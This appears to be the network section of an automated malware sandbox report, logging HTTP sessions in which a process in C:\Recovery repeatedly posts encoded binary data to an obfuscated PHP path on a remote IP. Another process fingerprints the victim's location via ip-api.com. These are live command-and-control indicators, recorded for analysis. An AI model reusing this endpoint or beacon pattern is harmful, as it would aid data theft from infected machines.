                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1532
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:27:53.393539906 CEST1532OUTData Raw: 58 52 5c 5e 5a 40 52 58 5e 5a 5a 56 50 5b 50 5e 55 5e 5c 5f 54 5d 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XR\^Z@RX^ZZVP[P^U^\_T]Z\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%[+R 7)=*?2"'\+Z%-##+)5Y '9^/.]+7
                                                                  Aug 1, 2024 04:27:53.837814093 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:27:53.968586922 CEST324INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:27:53 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 55 36 25 31 12 34 10 33 0a 3a 14 07 02 3f 55 21 05 29 3c 28 1e 30 0d 28 0a 28 3d 3c 58 3d 06 28 1f 31 3e 30 12 20 3c 0c 0e 3f 1c 2a 46 0c 10 25 5f 3c 03 3b 1e 25 01 23 51 2e 0e 0c 1b 27 2e 28 00 22 2c 36 18 37 05 27 00 28 01 20 50 25 39 27 0b 3a 3d 3a 5f 25 34 2e 5d 23 1f 2a 54 02 15 27 19 2a 3e 35 1d 24 32 12 14 26 2c 1a 0b 25 58 3d 10 21 2f 31 59 20 17 3d 03 27 38 09 56 3c 3d 3c 57 25 3f 05 01 3d 21 2d 51 35 17 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &U6%143:?U!)<(0((=<X=(1>0 <?*F%_<;%#Q.'.(",67'( P%9':=:_%4.]#*T'*>5$2&,%X=!/1Y ='8V<=<W%?=!-Q5 P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449743194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:27:59.877945900 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1552
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:00.247396946 CEST1552OUTData Raw: 5d 51 5c 50 5f 45 57 52 5e 5a 5a 56 50 5a 50 5b 55 54 5c 50 54 5b 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]Q\P_EWR^ZZVPZP[UT\PT[ZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%_)3!<X)0>=<!Q!(/\+8 $=&#<+: ^$9^/.]+3
                                                                  Aug 1, 2024 04:28:00.689836025 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:00.825644970 CEST380INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:00 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 55 35 18 03 5a 34 00 2b 0e 2d 3a 39 00 3f 1d 2a 5b 29 05 3c 5d 27 1d 05 1f 28 13 27 00 3d 01 20 5b 31 00 01 0c 20 2f 2e 0d 28 26 2a 46 0c 10 26 07 2b 2d 0d 56 32 11 01 1d 39 20 26 1a 25 2d 3f 5a 35 3f 29 0b 37 3b 33 01 28 38 24 51 27 29 3c 57 2e 00 08 59 31 37 00 10 23 0f 2a 54 02 15 27 57 2a 2d 2e 02 24 0c 23 04 25 2c 23 54 31 2e 2e 07 21 3c 3d 13 20 07 36 5b 33 28 06 0a 3c 2e 0a 19 31 3c 24 59 2a 31 36 0a 36 07 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &U5Z4+-:9?*[)<]'('= [1 /.(&*F&+-V29 &%-?Z5?)7;3(8$Q')<W.Y17#*T'W*-.$#%,#T1..!<= 6[3(<.1<$Y*166 P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449744208.95.112.1806828C:\ProgramData\Microsoft\based.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:05.803774118 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Accept-Encoding: identity
                                                                  User-Agent: python-urllib3/2.2.2
                                                                  Aug 1, 2024 04:28:07.273669004 CEST379INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:05 GMT
                                                                  Content-Type: application/json; charset=utf-8
                                                                  Content-Length: 202
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
                                                                  Aug 1, 2024 04:28:07.274243116 CEST379INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:05 GMT
                                                                  Content-Type: application/json; charset=utf-8
                                                                  Content-Length: 202
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
                                                                  Aug 1, 2024 04:28:07.274915934 CEST379INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:05 GMT
                                                                  Content-Type: application/json; charset=utf-8
                                                                  Content-Length: 202
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}
                                                                  Aug 1, 2024 04:28:07.275859118 CEST379INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:05 GMT
                                                                  Content-Type: application/json; charset=utf-8
                                                                  Content-Length: 202
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449745194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:05.948719978 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:06.314574003 CEST2512OUTData Raw: 58 53 5c 5f 5f 46 57 5d 5e 5a 5a 56 50 5f 50 50 55 57 5c 5b 54 5e 5a 59 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XS\__FW]^ZZVP_PPUW\[T^ZYYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%[(U*7Z'>#)?)V#;/<;00&70?5Z7+39^/.]+'
                                                                  Aug 1, 2024 04:28:06.627830982 CEST1236OUTData Raw: 58 53 5c 5f 5f 46 57 5d 5e 5a 5a 56 50 5f 50 50 55 57 5c 5b 54 5e 5a 59 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XS\__FW]^ZZVP_PPUW\[T^ZYYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%[(U*7Z'>#)?)V#;/<;00&70?5Z7+39^/.]+'
                                                                  Aug 1, 2024 04:28:07.274805069 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:07.275496006 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:07.275804996 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:07.278924942 CEST40OUTData Raw: 30 3f 17 19 0f 3f 2c 50 0b 2f 27 3c 22 03 1b 1c 39 3f 25 5e 2b 0b 1c 3e 3d 02 3b 26 12 0d 2a 56 2e 06 51 5c 0a 3e 57 51
                                                                  Data Ascii: 0??,P/'<"9?%^+>=;&*V.Q\>WQ
                                                                  Aug 1, 2024 04:28:07.730700970 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:06 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449746194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:06.202893019 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1972
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:06.550543070 CEST1972OUTData Raw: 5d 53 5c 52 5a 47 57 5c 5e 5a 5a 56 50 5f 50 5b 55 5f 5c 5e 54 5d 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]S\RZGW\^ZZVP_P[U_\^T]ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X?0=S#/+)U"]*5"],<;3[=Q7.)9)"4$_'=9^/.]+'
                                                                  Aug 1, 2024 04:28:06.627587080 CEST1236OUTData Raw: 09 34 23 58 38 39 49 09 09 38 16 1d 33 07 20 18 03 3c 5b 1a 35 3a 5c 25 0b 37 0e 00 3c 39 26 20 25 30 21 2e 39 1c 3e 21 3f 3f 5c 1c 3a 38 07 3e 02 30 3d 20 33 3f 0d 25 38 56 1e 13 31 04 19 3e 13 2e 09 19 09 58 09 34 08 3d 08 1f 35 32 17 3f 0d 04
                                                                  Data Ascii: 4#X89I83 <[5:\%7<9& %0!.9>!??\:8>0= 3?%8V1>.X4=52?%!(<.W60!G%=89<-<*<%"(X=6=1!+#0"$V1[$9-!9><]!=:89+ZX7Y:0?9U>,)59)X3<+V"1%1?,1-2: -Z>>50(<-*$115?:$*_
                                                                  Aug 1, 2024 04:28:07.127603054 CEST1236OUTData Raw: 5d 53 5c 52 5a 47 57 5c 5e 5a 5a 56 50 5f 50 5b 55 5f 5c 5e 54 5d 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]S\RZGW\^ZZVP_P[U_\^T]ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X?0=S#/+)U"]*5"],<;3[=Q7.)9)"4$_'=9^/.]+'
                                                                  Aug 1, 2024 04:28:07.275549889 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:07.275887966 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:07.440947056 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:07.549725056 CEST324INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:06 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 1f 22 40 2d 11 37 07 3f 0d 2c 3a 32 58 3f 0d 3a 58 28 2f 2c 59 33 33 2b 54 29 2e 24 59 3d 06 37 03 26 00 34 51 20 5a 35 57 28 0c 2a 46 0c 10 26 06 3f 2d 0d 55 32 3f 2b 57 2d 0e 32 1a 26 3e 33 5f 22 3f 2e 19 20 28 33 00 3e 28 1a 57 30 29 30 1a 2d 2e 3e 58 32 27 32 11 37 1f 2a 54 02 15 27 50 29 2e 3a 00 33 32 19 06 27 2f 23 10 31 3e 29 5f 22 05 2e 04 23 07 29 05 24 38 0e 0f 3f 58 3f 0b 24 3c 37 03 2a 22 21 51 21 17 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &"@-7?,:2X?:X(/,Y33+T).$Y=7&4Q Z5W(*F&?-U2?+W-2&>3_"?. (3>(W0)0-.>X2'27*T'P).:32'/#1>)_".#)$8?X?$<7*"!Q! P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449749194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:13.121543884 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1972
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:13.475258112 CEST1972OUTData Raw: 5d 53 59 54 5f 45 52 5a 5e 5a 5a 56 50 59 50 58 55 56 5c 58 54 50 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]SYT_ERZ^ZZVPYPXUV\XTPZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%<3: /+* 9(/1V!'Y<'$>)P4X3+. $9^/.]+
                                                                  Aug 1, 2024 04:28:13.925272942 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:14.057415009 CEST324INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:13 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 52 36 1f 29 5b 34 00 0d 0b 2d 2a 35 05 3f 0d 26 10 3d 02 30 10 24 30 23 52 29 3d 3c 1f 29 06 3c 5c 31 3e 24 12 34 02 35 1f 3c 36 2a 46 0c 10 26 02 3c 3d 2b 1e 26 01 28 0e 2c 20 32 18 31 10 3b 5f 22 3f 0f 0c 37 15 3f 04 3c 06 20 56 24 29 3c 15 2d 2d 2e 16 26 0e 22 11 23 0f 2a 54 02 15 27 51 3d 3d 2a 03 33 0b 24 5d 26 3c 37 1f 24 2d 21 5f 36 02 00 04 20 39 2e 5d 24 38 0d 1a 3f 3e 02 51 25 3c 38 13 3d 22 26 0f 21 07 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &R6)[4-*5?&=0$0#R)=<)<\1>$45<6*F&<=+&(, 21;_"?7?< V$)<--.&"#*T'Q==*3$]&<7$-!_6 9.]$8?>Q%<8="&! P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449750194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:18.950993061 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2504
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:19.741637945 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:19.956641912 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:20.653506994 CEST2504OUTData Raw: 5d 52 5c 50 5f 47 57 5a 5e 5a 5a 56 50 5e 50 5c 55 51 5c 5a 54 5a 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]R\P_GWZ^ZZVP^P\UQ\ZTZZ]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&<#=4(*-*!+0?,'*#$U(9577'9^/.]+7
                                                                  Aug 1, 2024 04:28:20.925170898 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:19 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z
                                                                  Aug 1, 2024 04:28:21.140621901 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:19 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.449751194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:20.849490881 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1972
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:21.206998110 CEST1972OUTData Raw: 58 5f 5c 56 5f 43 52 58 5e 5a 5a 56 50 58 50 51 55 53 5c 58 54 5b 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: X_\V_CRX^ZZVPXPQUS\XT[ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(#U!<4_=09*,!+?]*;$.*7.+! '39^/.]+;
                                                                  Aug 1, 2024 04:28:21.651439905 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:21.793061972 CEST380INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:21 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
